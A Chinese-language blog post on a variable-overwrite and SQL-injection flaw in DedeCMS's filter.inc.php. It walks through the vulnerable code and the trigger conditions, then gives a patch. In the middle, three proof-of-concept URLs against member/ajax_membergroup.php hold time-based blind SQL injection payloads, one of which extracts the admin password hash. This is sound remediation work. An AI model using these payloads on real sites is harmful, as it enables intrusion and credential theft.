今天在做網站監察的時候,發現網站出了一個問題,在對網站做木馬監測的時候,掃描出一個可疑文件:/include/filter.inc.php,建議刪除,但仔細檢查后,發現此文件是織夢(Dedecms)系統自帶的問題,那么,我們該如何解決呢?
漏洞描述:dedecms的filter.inc.php這個文件在系統配置文件之后,里面有foreach循環創建變量,可以覆蓋系統變量從而導致注入漏洞。
漏洞路徑:/include/filter.inc.php
漏洞分析:
/include/filter.inc.php文件中:
function _FilterAll($fk, &$svar)
{
global $cfg_notallowstr,$cfg_replacestr;
if( is_array($svar) )
{
foreach($svar as $_k => $_v)
{
$svar[$_k] = _FilterAll($fk,$_v);
}
}
else
{
if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar))
{
ShowMsg(" $fk has not allow words!",'-1');
exit();
}
if($cfg_replacestr!='')
{
$svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);
}
}
return $svar; //未對外部提交的數據進行有效轉義,直接return返回造成本地變量注入
}
/* 對_GET,_POST,_COOKIE進行過濾 */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v)
{
${$_k} = _FilterAll($_k,$_v);
}
}
1. 在magic_quotes_gpc=off的時候可以繞過_RunMagicQuotes的過濾
xxx.php?site=skyhome’s blog
2. 經過common.inc.php
$skyhome = skyhome\’s blog
3. 經過filter.inc.php
$skyhome = skyhomen’s blog //重新獲得閉合攻擊性
漏洞觸發條件:
1. 程序不允許創建cfg_開頭的變量,依靠這樣來防御系統變量未初始化漏洞。
2. common.inc.php文件的漏洞我們創建了系統變量就可以觸發此類漏洞,但是有的系統變量已經初始化了,而且是在common.inc.php文件foreach循環注冊變量之后,就是說我們能創建,但是不能覆蓋。
3. 但是filter.inc.php這個文件又進行了一次foreach循環也就是二次創建。所以如果包含了filter.inc.php文件我們就可以覆蓋系統變量。
4. 在/member目錄的大部分文件都包含這么一個文件/member/config.php,這個文件的前兩句就是:
require_once(dirname(__FILE__).’/../include/common.inc.php’);
require_once(DEDEINC.’/filter.inc.php’);
也就是說member目錄的大部分文件都受此漏洞影響,可以覆蓋掉系統變量 。
0x1: POC1
http://www.mahaixiang.cn/dedecms5.5/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select pwd from dede_admin),1,1)='f',sleep(5),0)) -- - @`'`
0x2: POC2
http://www.mahaixiang.cn/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select 1),1,1)='1',sleep(5),0)) -- - @`'`
0x3: POC3
http://www.mahaixiang.cn/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select user()),1,1)='r',sleep(5),0)) -- - @`'`
漏洞解決:
/include/filter.inc.php
$magic_quotes_gpc = ini_get('magic_quotes_gpc');
function _FilterAll($fk, &$svar)
{
global $cfg_notallowstr,$cfg_replacestr;
if( is_array($svar) )
{
foreach($svar as $_k => $_v)
{
$svar[$_k] = _FilterAll($fk,$_v);
}
}
else
{
if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar))
{
ShowMsg(" $fk has not allow words!",'-1');
exit();
}
if($cfg_replacestr!='')
{
$svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);
}
}
if (!$magic_quotes_gpc) {
$svar = addslashes($svar);
}
return $svar;
}
/* 對_GET,_POST,_COOKIE進行過濾 */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v)
{
${$_k} = _FilterAll($_k,$_v);
}
}
好了,到這就先結束了!
來源:http://www.moke8.com/article-16612-1.html